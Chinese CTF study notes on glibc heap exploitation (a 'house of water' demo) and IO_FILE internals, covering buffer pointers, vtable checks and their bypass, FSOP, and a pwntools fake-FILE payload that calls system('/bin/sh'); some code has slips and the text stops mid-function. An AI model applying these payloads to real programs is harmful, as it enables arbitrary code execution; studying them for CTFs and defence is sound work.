malloc一个合适大小(大于max(prev,victim),小于等于prev+victimchunk),再malloc一个与victim相同大小的chunk,此时这两个chunk间存在重叠。

char* a=malloc(0x100);  
char* b=malloc(0x80);
assert(a+0x100>b);

house of water

  • 在没有show的情况下可以利用UAF(EAF)并且可以申请超大堆块

how2heap演示

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main(){
void *_ = NULL;
setbuf(stdin,NULL);
setbuf(stdout,NULL);
setbuf(stderr,NULL);

//step1:添加堆块0x3e8,0xf8之后依次释放,在tcache_perthread_struct上面伪造一个size 0x10001(在0x88偏移处)
void *fake_size_lsb = malloc(0x3d8);
void *fake_size_msb = malloc(0x3e8);
free(fake_size_lsb);
free(fake_size_msb);

void *metadata = (void *)((long) (fake_size_lsb & -(0xfff)));

//填满0x90的tcache链,这样再申请最终大小为0x90堆块并释放后就会进入unsortedbin
void *x[7];
for(int i = 0 ; i < 7 ; i ++){
x[i] = malloc(0x88);
}

//间隔创建三个chunk,并且增加间隔防止合并,这三个chunk全部在unsortedbin的位置。然后创建了一个巨大的0xf000的chunk,用来填充到0x10001,目的是为了让最开始讲的tcache_perthread_struct那个0x10001作为size是合法的
void *unsorted_start = malloc(0x88);
_ = malloc(0x18);
void *unsorted_middle = malloc(0x88);
_ = malloc(0x18);
void *unsorted_end = malloc(0x88);
_ = malloc(0x18);
_ = malloc(0xf000);

//创建0x20大小的 chunk,并且伪造prev_size和下一个chunk的size:0x20
void *end_of_fake = malloc(0x18);
*(long *)end_of_fake = 0x10000;
*(long *)(end_of_fake + 0x8) = 0x20;

//填满 tcachebin
for(int i = 0 ; i < 7 ; i ++){
free(x[i]);
}

//在unsorted_start的上面设置了一个0x31的堆块并且释放,释放掉之后由于进入tcachebin会加入一个验证的key,这个key会覆盖掉原本unsorted_start的size,所以得还原
*(long *)(unsorted_start - 0x18) = 0x31;
free(unsorted_start - 0x10);
*(long *)(unsorted_start - 0x8) = 0x91;

//在unsorted_end的上面设置了一个0x21的堆块并且释放,释放掉之后由于进入tcachebin会加入一个验证的key,这个key会覆盖掉原本unsorted_start的size,所以得还原
*(long *)(unsorted_end - 0x18) = 0x21;
free(unsorted_end - 0x10);
*(long *)(unsorted_start - 0x8) = 0x91;

//在tcache_perthread_struct中,0x20大小的会在tcachebin的第一个位置,而0x30大小的会在tcachebin的第二个位置,于是就造成了0x10001这个值下面刚好是这么两个地址,这样的话,也就是说假设0x10001进入bin,那么它的fd指针将指向unsorted_end,而bk指针将指向unsorted_start

//释放了三个chunk,unsortedbin里会变成:unsorted_start->unsorted_middle->unsorted_end
free(unsorted_end);
free(unsorted_middle);
free(unsorted_start);

//将unsorted_start的fd指针变成fake_chunk,unsorted_end的bk指针变成fake_chunk
*(unsigned long *)unsorted_start = (unsigned long)(metadata+0x80);
*(unsigned long *)(unsorted_end+0x8) = (unsigned long)(metadata+0x80);

//unsortedbin变成了unsorted_start->fake_chunk->unsorted_end
//进行切割如果unsortebin 里面没有合适大小的块,则它会按顺序分配到smallbin或者largebin中,然后再进行切割,很明显这里会把unsorted_start和unsorted_end放入smallbin,而fakechunk进入largebin
//所以只要选择一个小于0x10000的块,这样在放入各自的bin之后,由于只有fakechunk进入了largebin,它一定会在某两个位置出现libc地址,而这两个位置会变成tcachebin的两个
//在此之后,如果申请相应大小的tcachebin的chunk,则会在libc上建立相应的堆块
void *meta_chunk = malloc(0x288);
assert(meta_chunk == (metadata+0x90));
}
接下来打_IO_FILE就行了,将flag设置为 0xfbad1800 ,目的是让他冲掉缓冲区,将内容输出出来 然后read_ptr,read_end,read_base这三项随意,设置为0,同时修改好 write_base write_ptr 和 write_end 然后他会输出从 write_base 到 write_ptr 中的内容

泄露libc后可以打house of apple

house of tangerine(house of orange plus)

house of minho

IO_FILE

IO数据结构

对于LBA硬盘来说,读写数据都必须一块一块的读,如果我们每次执行read,write时都是操作很少的数据,则对系统消耗非常大,因此,C库就想了一个好办法——缓冲区。所以,就比较好理解了,缓冲区是为了减少3坏操作外部硬件时的消耗产生的,一切都是以外部硬件为服务对象。

1.从外部硬件读取时。为了减少消耗,会一次从外部硬件读取一“块”数据,并放入缓冲区,然后当target需要时,再从头部慢慢读取,只到读完才再次从硬件读取。这个缓冲区叫输入缓冲区。 2.向外部硬件写入时。为了减少消耗,不会一有东西就写入,而是先将内容从source写入缓冲区,当缓冲区满了时候再将内存一起写入硬件。这个缓冲区叫输出缓冲区。

首先,以从外部硬件读取为例,我们要有输入缓冲区开始(base)、结尾(end)和当前(ptr)已经用了多少的指针。很明显当ptr == end时,说明输入缓冲区里的东西已经全部读完,需要重新从硬件读入。 同样,对于向外部硬件写入为例,我们要有输出缓冲区开始(base)、结尾(end)和当前(ptr)已经写了多少的指针。很明显当ptr == end时,说明输出缓冲区已经写满,可以向硬件写入了。

上面的内容看似非常清楚,但这里其实有一些比较容易混乱的地方。因为缓冲区内存储的是数据,输入、输出两者数据流动方向不同,但保护主体都一样,都是外部设备,所以有用的数据部分就有所不相同。 1. 对于输入缓冲区ptr-end是有用的数据,base-ptr为已使用的数据。 2. 对于输出缓冲区base-ptr是要写入硬件的内容(有用数据),ptr-end为空闲区域。 3. 两者结尾有所不同。 1. 对于输入缓冲区,因为从硬盘中读取的数据可能无法填满整个缓冲区的块,所以_IO_buf_end != _IO_read_end。输入缓冲区要使用_IO_read_end判断结束。 2. 对于输出缓冲区,缓冲区的结束就是输出缓冲区结束,_IO_buf_end == _IO_write_end。输出缓冲区往往使用_IO_buf_end判断结束。

虽然,输入、输出缓冲区作用不同,但原理上都是一块内存。一块外部设备可能既可以写入也可以读取,为了节省空间,我们可以定义一块缓冲区,需要输入的时候就做输入缓冲区,需要输出就做输出缓冲区。那么我们就有了8个指针。

char *_IO_buf_base;    //缓冲区的基地址
char *_IO_buf_end;   //缓冲区的结束地址
char *_IO_read_base; //输入缓冲区基地址
char *_IO_read_ptr;   //输入当前位置
char *_IO_read_end; //输入缓冲区结尾地址
char *_IO_write_base; //输出缓冲区基地址
char *_IO_write_ptr; //输出当前位置
char *_IO_write_end; //输出缓冲区结尾地址

从文件中读取 程序是从fd中读取一批数据到缓冲区中(_IO_buf_base 至 _IO_buf_end),_IO_read_ptr 指向已向target中写完的位置,既 _IO_read_ptr 至 _IO_read_end 为还没有写入target中的数据。当_IO_read_ptr == _IO_read_end时,说明输入缓冲区内已经没有可用数据,需要再次从文件中读入数据。

向文件输出 程序是先将source中的数据写入到缓冲区中,_IO_write_ptr 指向已从source中写到的位置,既 _IO_write_ptr 至 _IO_write_pend 为还剩余的空间。当_IO_write_ptr == _IO_buf_end时,再全部写入fd中。

IO数据操作

1.从硬盘中读入数据

  1. fd中读取一批(一块)数据到输入缓冲区中(_IO_buf_base 至 _IO_buf_end),同时对_IO_read_base _IO_read_ptr _IO_read_end 设置初始值。(_IO_read_ptr == _IO_read_base ,当然也可能不同)
  2. _IO_read_ptr 处向需要的内存中复制数据,同时把_IO_read_ptr 向后移位。
  3. _IO_read_ptr == _IO_read_end时,说明缓冲区内已经没有可用数据,需要再次从文件中读入数据。冲入第一步。

2.向硬盘中写入数据

  1. 先将source中的数据复制到输出缓冲区中,_IO_write_ptr 指向已写到的位置。
  2. _IO_write_ptr == _IO_buf_end时,将缓冲区中的内容全部写入fd中,并将_IO_write_ptr设置为 _IO_write_base,重复第一步。

3.申请缓冲区

申请一块缓冲区,并设置_IO_buf_base为开头,_IO_buf_end为结尾。

_IO_file_jumps 函数操作

1._IO_new_file_finish

是文件结束的操作,所以它的操作如下 1. 清空所有缓冲区 2. 关闭(close)文件

2._IO_new_file_overflow

主要是处理当输出缓冲区用完时,向硬盘写入数据

当然,其实这个函数内部非常复杂,加入了一些检测。例如,如果缓冲区不存在则要初始化缓冲区。并且,这个函数的参数中有一个标志位 1. 如果 ch == EOF,则输出f->_IO_write_ptr - f->_IO_write_base的区间。 2. 如果 ch != EOF,并且f->_IO_write_ptr == f->_IO_buf_end,则将缓冲区全部输出。 3. 如果 ch == '\n',则输出 f->_IO_write_ptr - f->_IO_write_base加一个换行符。 4. 以上都不满足就返回ch

3._IO_new_file_underflow

这个函数与_IO_new_file_overflow差不多,主要是用于从硬盘中读取数据,每次读取都是_IO_buf_base_IO_buf_end

为了防止硬盘中没有这么多数据,设置_IO_read_end为读取的总数。如果,缓冲区不存在则要初始化缓冲区。程序返回_IO_read_ptr指针。

4.__GI__IO_default_uflow(_IO_default_uflow)

这个函数就是调用_IO_new_file_underflow,并简单做了一些检测。

5.__GI__IO_default_pbackfail(_IO_default_pbackfail)

设置存储的函数,暂不重要。

6._IO_new_file_xsputn

这个函数是主要目的是将数据从source放入输出输出缓冲区。显然,放入过程中还有几种情况。 1. 如果要写入的数据小于剩余的空间_IO_write_ptr - _IO_buf_end,那么就直接将数据写入输出缓冲区即可。 2. 如果要写入的数据大于剩余的空间_IO_write_ptr - _IO_buf_end。 1. 先将输出缓冲区填满,再调用_IO_new_file_overflow清空输出缓冲区。 2. 剩余的数据继续调用 _IO_new_file_xsputn

说明:我们平时的输出函数主要就是调用此函数。

7.__GI__IO_file_xsgetn(_IO_file_xsgetn)

这个函数是主要目的是将数据从输入缓冲区放入target。显然放入过程中还有几种情况。 1. 如果要读取的数据小于剩余的数据_IO_read_ptr - _IO_read_end,那么就直接将数据读取到target即可。 2. 如果要读取的数据大于剩余的数据_IO_read_ptr - _IO_read_end。 1. 先将输入缓冲区全部数据读出,再调用_IO_new_file_underflow从硬盘读入一块数据。 2. 如果需要读取数据特别多,就调用__GI__IO_file_read从硬盘直接读取数据。

说明:我们平时的输入函数主要就是调用此函数。

8._IO_new_file_seekoff

设置偏移函数,就是设置我们所说的ptr指针。

9._IO_default_seekpos

就是调用_IO_new_file_seekoff

10._IO_new_file_setbuf

这个函数也比较简单,看名字就知道是设置缓冲区的,作用就是初始化各个缓冲区 1. _IO_write_base = _IO_write_ptr = _IO_write_end = _IO_buf_base 2. _IO_read_base = _IO_read_ptr = _IO_read_end = _IO_buf_base (使用 _IO_setg 宏)

11._IO_new_file_sync

同步函数,负责与硬盘和缓冲区之间进行同步。

12.__GI__IO_file_doallocate(_IO_default_doallocate)

这个就是申请缓冲区的函数,申请完之后还要把输入、输出缓冲区初始化。

13.GI__IO_file_read(_IO_file_read)

这个是输入的最终函数,它将syscall_read进行了一定的封装。

14._IO_new_file_write

这个是输出的最终函数,它将syscall_write进行了一定的封装。

15.GI__IO_file_seek(_IO_file_seek)

调用__lseek64

16.__GI__IO_file_close(_IO_file_close)

就和名字一样,关闭文件。

17.__GI__IO_file_stat(_IO_file_stat)

获取文件描述符的状态。调用__fxstat64

18._IO_default_showmanyc

此函数没用,返回-1。

19._IO_default_imbue

此函数没用。

20.其他一些内容

flag标志位

`#define _IO_MAGIC 0xFBAD0000 /* Magic number */`
`#define _OLD_STDIO_MAGIC 0xFABC0000 /* Emulate old stdio. */`
`#define _IO_MAGIC_MASK 0xFFFF0000`
`#define _IO_USER_BUF 1 /* User owns buffer; don't delete it on close. */`
`#define _IO_UNBUFFERED 2`
`#define _IO_NO_READS 4 /* Reading not allowed */`
`#define _IO_NO_WRITES 8 /* Writing not allowd */`
`#define _IO_EOF_SEEN 0x10`
`#define _IO_ERR_SEEN 0x20`
`#define _IO_DELETE_DONT_CLOSE 0x40 /* Don't call close(_fileno) on cleanup. */`
`#define _IO_LINKED 0x80 /* Set if linked (using _chain) to streambuf::_list_all.*/`
`#define _IO_IN_BACKUP 0x100`
`#define _IO_LINE_BUF 0x200`
`#define _IO_TIED_PUT_GET 0x400 /* Set if put and get pointer logicly tied. */`
`#define _IO_CURRENTLY_PUTTING 0x800`
`#define _IO_IS_APPENDING 0x1000`
`#define _IO_IS_FILEBUF 0x2000`
`#define _IO_BAD_SEEN 0x4000`
`#define _IO_USER_LOCK 0x8000`

flush_IO_do_flush

清空缓冲区,将输出缓冲区清空。

全部清空函数(fflush

# define fflush(s) _IO_fflush (s)  //  /assert/assert.c
// /libio/iofflush.c
int _IO_fflush (FILE *fp)
{
  if (fp == NULL)
    return _IO_flush_all ();
  else
    {
      int result;
      CHECK_FILE (fp, EOF);
      _IO_acquire_lock (fp);
      result = _IO_SYNC (fp) ? EOF :0;
      _IO_release_lock (fp);
      return result;
    }
}
libc_hidden_def (_IO_fflush)

可以看出 fflush函数在参数为空时,清空(_IO_flush_all_lockp => _IO_OVERFLOW)全部文件;不为空时,同步(sync)指定文件,两种情况执行步骤不同。

缓冲区设置宏

_IO_setg _IO_setp 等等

虚表检测

虚表检测是2.24之后加入的内容,IO_validate_vtable检测如果虚表超出范围就进入_IO_vtable_check函数。各路大神找到的house很多都不是打file的跳表,而是其他处理跳表,但都差不太多。简要梳理如下。

  1. 2.23 的没有任何限制,可以将vtable 劫持在堆上并修改其内容,然后触发FSOP,
  2. 2.24 引入了vtable check,使得将vtable 整体劫持到堆上已不可能,大佬发现可以使用内部的vtable_IO_str_jumps_IO_wstr_jumps来进行利用。
  3. 2.31 中将_IO_str_finish函数中强制执行free函数,导致无法使用上述问题,因而催生出其他调用链。

虚表范围

虚表位置判断主要在IO_validate_vtable函数,2.37以前判断区间为_IO_helper_jumps - _IO_str_jumps之间的区域 0xd60,里面有以下虚表

_IO_helper_jumps
_IO_helper_jumps
_IO_cookie_jumps
_IO_proc_jumps
_IO_str_chk_jumps
_IO_wstrn_jumps
_IO_wstr_jumps
_IO_wfile_jumps_maybe_mmap
_IO_wfile_jumps_mmap
__GI__IO_wfile_jumps
_IO_wmem_jumps
_IO_mem_jumps
_IO_strn_jumps
_IO_obstack_jumps
_IO_file_jumps_maybe_mmap
_IO_file_jumps_mmap
__GI__IO_file_jumps
_IO_str_jumps

攻击_IO_vtable_check

IO_validate_vtable函数检查如果虚表超出范围,会进入_IO_vtable_check函数,

void attribute_hidden _IO_vtable_check (void)
{
#ifdef SHARED
  /* Honor the compatibility flag.  */
  void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (flag);
#endif
  if (flag == &_IO_vtable_check) //检查是否是外部重构的vtable
    return;
只是要满足一定条件。那么我们还是可以绕过虚表检测的 1. 泄露ptr_guard,反算IO_accept_foreign_vtables然后修改。 2. 因为IO_accept_foreign_vtables中基本都是0,直接将ptr_guard修改为&_IO_vtable_check也可以。 但无论如何我们都需要有ld文件

外置虚表

check_stdfiles_vtables函数是设置外置虚表的函数,如果能执行这个函数,也可以绕过虚表检测

static void  check_stdfiles_vtables (void)
{
  if (_IO_2_1_stdin_.vtable != &_IO_file_jumps
      || _IO_2_1_stdout_.vtable != &_IO_file_jumps
      || _IO_2_1_stderr_.vtable != &_IO_file_jumps)
    IO_set_accept_foreign_vtables (&_IO_vtable_check);
}

IO_FILE结构体

_IO_FILE_plus

0x0   _flags
0x8 _IO_read_ptr
0x10 _IO_read_end
0x18 _IO_read_base
0x20 _IO_write_base
0x28 _IO_write_ptr
0x30 _IO_write_end
0x38 _IO_buf_base
0x40 _IO_buf_end
0x48 _IO_save_base
0x50 _IO_backup_base
0x58 _IO_save_end
0x60 _markers
0x68 _chain
0x70 _fileno
0x74 _flags2
0x78 _old_offset
0x80 _cur_column
0x82 _vtable_offset
0x83 _shortbuf
0x88 _lock
0x90 _offset
0x98 _codecvt
0xa0 _wide_data
0xa8 _freeres_list
0xb0 _freeres_buf
0xb8 __pad5
0xc0 _mode
0xc4 _unused2
0xd8 vtable

_IO_wide_data

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */

__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;

wchar_t _shortbuf[1];

const struct _IO_jump_t *_wide_vtable;
};

_IO_wstrn_jumps

const struct _IO_jump_t _IO_wstrn_jumps attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT_DUMMY2,
JUMP_INIT(finish, _IO_wstr_finish),
JUMP_INIT(overflow, (_IO_overflow_t) _IO_wstrn_overflow),
JUMP_INIT(underflow, (_IO_underflow_t) _IO_wstr_underflow),
JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow),
JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wstr_pbackfail),
JUMP_INIT(xsputn, _IO_wdefault_xsputn),
JUMP_INIT(xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT(seekoff, _IO_wstr_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_default_setbuf),
JUMP_INIT(sync, _IO_default_sync),
JUMP_INIT(doallocate, _IO_wdefault_doallocate),
JUMP_INIT(read, _IO_default_read),
JUMP_INIT(write, _IO_default_write),
JUMP_INIT(seek, _IO_default_seek),
JUMP_INIT(close, _IO_default_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};

_IO_obstack_jumps

/* the jump table.  */
const struct _IO_jump_t _IO_obstack_jumps libio_vtable attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, _IO_obstack_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, _IO_obstack_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};

IO_FILE结构体的调用

初始化

初始情况下 _IO_FILE 结构有 * _IO_2_1_stderr_  * _IO_2_1_stdout_ * _IO_2_1_stdin_  通过 _IO_list_all 将这三个结构连接,_chain指向下一个结构体 * _IO_list_all->_IO_2_1_stderr_->_IO_2_1_stdour_->_IO_2_1_stdin_ 并且存在 3 个全局指针 * stdin指向 _IO_2_1_stdin_ * stdout指向_IO_2_1_stdout_ * stderr指向_IO_2_1_stderr_  存在函数指针结构体vatble,存放着各种 IO 相关的函数的指针 [[./_IO_list_all1.png]] ### fopen  * fopen  * _IO_new_fopen  * __fopen_internal  * malloc创建lock_FILE结构体  * _IO_no_init对结构体进行null初始化  * _IO_file_init将结构体链入_IO_list_all  * _IO_file_open执行系统调用打开文件

fread

  • fread
  • _IO_sgetn
  • _IO_file_xsgetn
  • 若缓冲区没有初始化则调用_IO_doallocbuf->_IO_file_doallocate初始化IO缓冲区,申请一块堆,只初始化_IO_buf_base、_IO_buf_end
  • 若缓冲区有数据未复制到buf,则在buf数据总量不超过所需数据的前提下尽可能多把数据复制到buf中
  • 若缓存区长度小于所需数据长度则重置缓冲区读写指针
  • _underflow调用系统函数_IO_SYSREAD向buf读入数据
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x555555559290
Size: 0x1e0 (with flag bits: 0x1e1)

Allocated chunk | PREV_INUSE
Addr: 0x555555559470
Size: 0x1010 (with flag bits: 0x1011)

Top chunk | PREV_INUSE
Addr: 0x55555555a480
Size: 0x1fb80 (with flag bits: 0x1fb81)

pwndbg> p *(struct _IO_FILE_plus*) 0x5555555592a0
$2 = {
file = {
_flags = -72539000,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x555555559480 "",
_IO_buf_end = 0x55555555a480 "",
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7e044e0 <_IO_2_1_stderr_>,
_fileno = 3,
_flags2 = 0,
_old_offset = 0,
_cur_column = 0,
_vtable_offset = 0 '\000',
_shortbuf = "",
_lock = 0x555555559380,
_offset = -1,
_codecvt = 0x0,
_wide_data = 0x555555559390,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0,
_mode = 0,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7ffff7e02030 <_IO_file_jumps>
}
pwndbg> tele 0x5555555592a0
00:0000│ rbx 0x5555555592a0 ◂— 0xfbad2488
01:0008│ 0x5555555592a8 ◂— 0
... ↓ 5 skipped
07:0038│ 0x5555555592d8 —▸ 0x555555559480 ◂— 0
pwndbg>
08:0040│ 0x5555555592e0 —▸ 0x55555555a480 ◂— 0
09:0048│ 0x5555555592e8 ◂— 0
... ↓ 3 skipped
0d:0068│ 0x555555559308 —▸ 0x7ffff7e044e0 (_IO_2_1_stderr_) ◂— 0xfbad2086
0e:0070│ 0x555555559310 ◂— 3
0f:0078│ 0x555555559318 ◂— 0
pwndbg>
10:0080│ 0x555555559320 ◂— 0
11:0088│ 0x555555559328 —▸ 0x555555559380 ◂— 1
12:0090│ 0x555555559330 ◂— 0xffffffffffffffff
13:0098│ 0x555555559338 ◂— 0
14:00a0│ 0x555555559340 —▸ 0x555555559390 ◂— 0
15:00a8│ 0x555555559348 ◂— 0
... ↓ 2 skipped
pwndbg>
18:00c0│ 0x555555559360 ◂— 0
... ↓ 2 skipped
1b:00d8│ 0x555555559378 —▸ 0x7ffff7e02030 (_IO_file_jumps) ◂— 0
1c:00e0│ 0x555555559380 ◂— 1
1d:00e8│ 0x555555559388 —▸ 0x7ffff7fb2740 ◂— 0x7ffff7fb2740
1e:00f0│ 0x555555559390 ◂— 0
1f:00f8│ 0x555555559398 ◂— 0
pwndbg>
20:0100│ 0x5555555593a0 ◂— 0
... ↓ 7 skipped
pwndbg>
28:0140│ 0x5555555593e0 ◂— 0
... ↓ 7 skipped
pwndbg>
30:0180│ 0x555555559420 ◂— 0
... ↓ 7 skipped
pwndbg>
38:01c0│ 0x555555559460 ◂— 0
39:01c8│ 0x555555559468 ◂— 0
3a:01d0│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
3b:01d8│ 0x555555559478 ◂— 0x1011
3c:01e0│ rsi 0x555555559480 ◂— 0
... ↓ 3 skipped
pwndbg> tele 0x555555559470
00:0000│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
01:0008│ 0x555555559478 ◂— 0x1011
02:0010│ rax rsi 0x555555559480 ◂— 'your_flag_content\n'
03:0018│ 0x555555559488 ◂— 'g_content\n'
04:0020│ 0x555555559490 ◂— 0xa74 /* 't\n' */
05:0028│ 0x555555559498 ◂— 0
... ↓ 2 skipped

[[./fread1.png]]

fwrite

  • fwrite
  • _IO_fwrite
  • _IO_file_xsputn
  • 若缓冲区有剩余空间,则在不超过缓冲区空闲空间的前提下尽可能多的待输出数据复制到缓冲区
  • 若有数据没有复制到缓冲区中,则调用_IO_new_file_overflow输出并清空输出缓存区数据
  • new_do_while直接输出buf中数据
  • 如果还有剩余数据则调用_IO_default_xsputn复制到输出缓冲区,如果剩余长度大于20字节则使用memcpy否则直接赋值 [[./fwrite1.png]]

fclose

  • fopen
  • _IO_new_fclose
  • _IO_un_link
  • _IO_file_close_it

vtable

fopen

函数是在分配空间,建立FILE结构体,未调用vtable中的函数

fread

  • _IO_sgetn函数调用了_IO_file_xsgetn
  • _IO_doallocbuf函数调用了_IO_file_doallocate以初始化输入缓冲区
  • _IO_file_doallocate调用了__GI__IO_file_stat获取文件信息
  • __underflow调用了_IO_new_file_underflow实现文件数据读取
  • _IO_new_file_underflow调用了vtable__GI__IO_file_read最终去执行系统调用read

fwrite

  • _IO_fwrite调用了_IO_new_file_xsputn
  • _IO_new_file_xsputn调用了_IO_new_file_overflow实现缓冲区的建立以及刷新缓冲区
  • _IO_new_file_overflow调用了_IO_file_doallocate以初始化输入缓冲区
  • _IO_file_doallocate调用了vtable中的 __GI__IO_file_stat以获取文件信息
  • new_do_write中的_IO_SYSWRITE调用了vtable_IO_new_file_write最终去执行系统调用write

fclose

  • 在清空缓冲区的_IO_do_write中会调用vtable中的函数
  • 关闭文件描述符_IO_SYSCLOSEvtable中的 __close函数
  • _IO_FINISHvtable中的__finish

FSOP

  • 核心思想:劫持_IO_list_all指向伪造的_IO_FILE_plus,之后使程序执行_IO_flush_all_lockp函数。该函数会刷新_IO_list_all链表中所有项的文件流,相当于对每个FILE调用fflush,也对应着会调用_IO_FILE_plus.vtable中的_IO_overflow
  • 利用前提:
    • 程序执行_IO_flush_all_lockp函数有三种情况:
      • libc执行abort流程时(2.27之后不再刷新)
      • 当执行exit函数时(仅刷新 stderr ,2.36后不再刷新)
      • 当执行流从main函数返回时
    • 绕过检查

abort栈回溯为:

_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
__GI_abort ()
__libc_message (do_abort=do_abort@entry=0x2, fmt=fmt@entry=0x7ffff7ba0d58 "*** Error in `%s': %s: 0x%s ***\n")
malloc_printerr (action=0x3, str=0x7ffff7ba0e90 "double free or corruption (top)", ptr=<optimized out>, ar_ptr=<optimized out>)
_int_free (av=0x7ffff7dd4b20 <main_arena>, p=<optimized out>,have_lock=0x0)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()
exit函数,栈回溯为:
_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()
程序正常退出,栈回溯为:
IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
__libc_start_main (main=0x400526 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)) && _IO_OVERFLOW(fp, EOF) == EOF) {
result = EOF;
}
fake_file = b""
fake_file += b"/bin/sh\x00" # _flags, an magic number
fake_file += p64(0) # _IO_read_ptr
fake_file += p64(0) # _IO_read_end
fake_file += p64(0) # _IO_read_base
fake_file += p64(0) # _IO_write_base
fake_file += p64(libc.sym['system']) # _IO_write_ptr
fake_file += p64(0) # _IO_write_end
fake_file += p64(0) # _IO_buf_base;
fake_file += p64(0) # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4 # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_']) # the FILE chain ptr
fake_file += p32(2) # _fileno for stderr is 2
fake_file += p32(0) # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _old_offset, -1
fake_file += p16(0) # _cur_column
fake_file += b"\x00" # _vtable_offset
fake_file += b"\n" # _shortbuf[1]
fake_file += p32(0) # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0) # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _offset, -1
fake_file += p64(0) # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160) # _IO_wide_data_1
fake_file += p64(0) * 3 # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF) # _mode, usually -1
fake_file += b"\x00" * 19 # _unused2
fake_file = fake_file.ljust(0xD8, b'\x00') # adjust to vtable
fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10) # fake vtable

缓冲区利用(未完善)

stdin

任意地址写

stdout

任意地址写

任意地址读

__IO_str_jumps(under 2.27)

  • 利用_IO_str_jumps__IO_wstr_jumps填入vtable绕过IO_validate_vtable检查

  • 确定_IO_str_jumps地址

    • 由于_IO_str_jumps不是导出符号,libc.sym["_IO_str_jumps"]查不到,可以利用_IO_str_jumps中的导出函数例如 _IO_str_underflow进行辅助定位
    • 首先先得到_IO_str_underflow地址,然后查找所有指向该地址的指针
    • 由于_IO_str_underflow_IO_str_jumps的偏移为0x20,并且_IO_str_jumps的地址大于_IO_file_jumps地址,因此可以在选择满足上述条件中最小的地址作为_IO_str_jumps的地址
      from bisect import *

      IO_file_jumps = libc.symbols['_IO_file_jumps']
      IO_str_underflow = libc.symbols['_IO_str_underflow']
      IO_str_underflow_ptr = list(libc.search(p64(IO_str_underflow)))
      IO_str_jumps = IO_str_underflow_ptr[bisect_left(IO_str_underflow_ptr, IO_file_jumps + 0x20)] - 0x20
      print(hex(IO_str_jumps))
  • 劫持io_str_finish

    void
    _IO_str_finish (_IO_FILE *fp, int dummy)
    {
    if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
